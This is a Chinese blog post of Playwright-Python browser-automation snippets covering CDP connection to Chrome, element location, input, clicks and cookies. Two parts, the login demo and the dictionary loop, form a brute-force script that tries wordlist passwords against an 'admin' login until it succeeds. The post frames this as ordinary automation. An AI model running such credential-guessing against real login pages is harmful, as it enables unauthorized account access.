playwright-python网页自动化

本文介绍了使用Playwright进行浏览器自动化的代码示例，包括连接现有Chrome浏览器、页面操作、元素定位和交互等。主要内容有：1）通过CDP协议连接运行中的Chrome浏览器；2）页面导航、截图、等待等操作；3）使用XPath定位元素并获取文本内容；4）输入文本、点击等交互操作；5）Cookie管理；6）读取字典文件进行自动化测试。这些代码片段可用于网页自动化测试、数据抓取等场景。

大山猛seven

349人浏览 · 2025-09-03 10:48:21

大山猛seven · 2025-09-03 10:48:21 发布

介绍

https://playwright.nodejs.cn/python/docs/intro

dome

启动

google-chrome --remote-debugging-port=9222 --user-data-dir="/tmp/chrome-dev-profile"

demo 遍历子元素

from playwright.sync_api import sync_playwright  
  
import utils.file  
import utils.time  
  
with sync_playwright() as p:  
    # 连接到已运行的Chrome实例  
    browser = p.chromium.connect_over_cdp("http://localhost:9222")  
    page = browser.contexts[0].pages[0]  
    titles = page.locator("//h3/div")  
    l = []  
    for tc in range(titles.count()):  
        temp = titles.nth(tc).text_content()  
        print(temp)  
        l.append(temp)  
    utils.file.write_file_unique("url",l)  
        # utils.time.random_pause()  
        # utils.time.random_pause()

demo 输入登录

from playwright.sync_api import sync_playwright  
  
import utils.file  
  
def connect_to_existing_chrome():  
    '''  
    google-chrome --remote-debugging-port=9222 --user-data-dir="/tmp/chrome-dev-profile"  
    demo 连接现有浏览器，开新页面进行  
    :return:    '''  
    path = './dic.txt'  
    dicTxt = utils.file.readFile(path)  
  
  
    with sync_playwright() as p:  
        # 连接到已运行的Chrome实例  
        browser = p.chromium.connect_over_cdp("http://localhost:9222")  
        page = browser.contexts[0].pages[0]  
        username = page.locator("//input[@name='username']")  
        password = page.locator("//input[@name='password']")  
        loginBt = page.locator("//input[@name='Login']")  
        for passwd in dicTxt:  
            username.fill("admin")  
            password.fill(passwd)  
            print(passwd)  
            loginBt.click()  
            page.wait_for_timeout(500)  
            if(0 == page.locator("//input[@name='Login']").count()):  
  
                break  
  
  
  
        # browser.close()  
  
  
if __name__ == "__main__":  
    connect_to_existing_chrome()

代码片段

浏览器

启动一个监听浏览器

google-chrome --remote-debugging-port=9222 --user-data-dir="/tmp/chrome-dev-profile"

连接现有浏览器

from playwright.sync_api import sync_playwright
with sync_playwright() as p:  
    # 连接到已运行的Chrome实例  
    browser = p.chromium.connect_over_cdp("http://localhost:9222")  
    browser.close()

添加删除cookie

  login_cookies = [
            {
                "name": "user_id",
                "value": "123456",
                "url": "https://www.example.com",  # Cookie 所属网站的根 URL
                "domain": ".example.com",         # 作用于所有子域名（如 blog.example.com）
                "path": "/",                      # 作用于网站所有路径
                "expires": 1719878400000,         # 过期时间：2024-07-01 00:00:00（时间戳）
                "httpOnly": True,                 # 禁止前端 JS 读取，提升安全性
                "secure": True,                   # 仅在 HTTPS 下携带
                "sameSite": "Lax"                 # 跨站请求时的携带规则
            },
            {
                "name": "session_token",
                "value": "abcdef123456xyz",
                "url": "https://www.example.com",
                "path": "/",
                "secure": True
            }
        ]

browser_context.add_cookies(login_cookies)

context.clear_cookies()
context.clear_cookies(name="session-id")
context.clear_cookies(domain="my-origin.com")
context.clear_cookies(path="/api/v1")
context.clear_cookies(name="session-id", domain="my-origin.com")

页面

新建页面

page = browser.new_page()

使用当前页面

page = browser.contexts[0].pages[0]

前往页面

page.goto("http://aliyun.bd7oxy.top")

截图页面

page.screenshot(path="example.png")

页面等待

page.wait_for_timeout(1500)

元素

xpath获取元素

[[018 XPath漏洞#例子]]

element = page.locator("//h1")  # 定位所有 h1 标签

元素获取数量

items.count()

元素获取文本

item.text_content()

等待元素可见

button.wait_for(state="visible")  # 等待可见

滚动到可见区域

item.scroll_into_view_if_needed()

判断元素是否存在

if(0 == item.count()):
	print("元素不存在")

匹配到多个元素

titles = page.locator("//h3/div")  
for i in range(titles.count()):  
    print(titles.nth(1).text_content())

按键

输入

name.fill("admin")

输入

page.keyboard.insert_text("嗨")

按下

page.keyboard.type("Hello World!")
page.keyboard.press("ArrowLeft")
page.keyboard.down("Shift")
for i in range(6):
    page.keyboard.press("ArrowLeft")
page.keyboard.up("Shift")
page.keyboard.press("Backspace")
# result text will end up saying "Hello!"

点击

item.click()

右键点击

item.click(button='right')

偏移点击

item.click(position={"x": 10, "y": 10})

强制点击

用于被遮挡情况

page.locator("//div").click(force=True)

读取字典方法

def read_passwords_from_file(file_path):
    """读取本地文本文件中的密码，每行一个密码"""
    passwords = []
    try:
        with open(file_path, 'r', encoding='utf-8') as f:
            # 读取所有行，去除空行和换行符
            for line in f:
                password = line.strip()
                if password:  # 跳过空行
                    passwords.append(password)
        return passwords
    except FileNotFoundError:
        print(f"错误：未找到文件 {file_path}")
        return []
    except Exception as e:
        print(f"读取文件时发生错误：{str(e)}")
        return []

遍历

 for password in passwords:
            print(f"尝试登录 - 用户名: {username}, 密码: {password}")
            # 填写密码
            password_field.fill(password)
            # 点击登录按钮
            login_button.click()
            # 等待页面响应
            page.wait_for_timeout(1500)  # 根据实际情况调整等待时间
            # 这里可以添加登录成功的判断逻辑
            # 如果登录成功可以添加break退出循环

魔乐社区

魔乐社区（Modelers.cn) 是一个中立、公益的人工智能社区，提供人工智能工具、模型、数据的托管、展示与应用协同服务，为人工智能开发及爱好者搭建开放的学习交流平台。社区通过理事会方式运作，由全产业链共同建设、共同运营、共同享有，推动国产AI生态繁荣发展。

更多推荐

替你试过了，消费级显卡可以跑的开源文生图SOTA模型，顶级渲染、高密度文本绘图

魔乐社区

量化挑战赛冠军专访：4小时啃下W4A8量化，我靠的是这些经验

魔乐社区

小参数・大码力・易部署 | Qwen3.6-27B上线魔乐社区，基于昇腾的部署教程来了

继一周前模型开源发布后，千问再度开源Qwen3.6-27B —— 一个拥有270亿参数的稠密多模态模型，也是社区呼声最高的模型规格。Qwen3.6-27B 依然支持多模态思考与非思考模式，在智能体编程方面达到了旗舰级表现，全面超越前代开源旗舰 Qwen3.5-397B-A17B（总参数397B / 激活参数17B的MoE模型）。作为稠密架构，它无需MoE路由即可部署，是开发者在实用、可广泛部署规模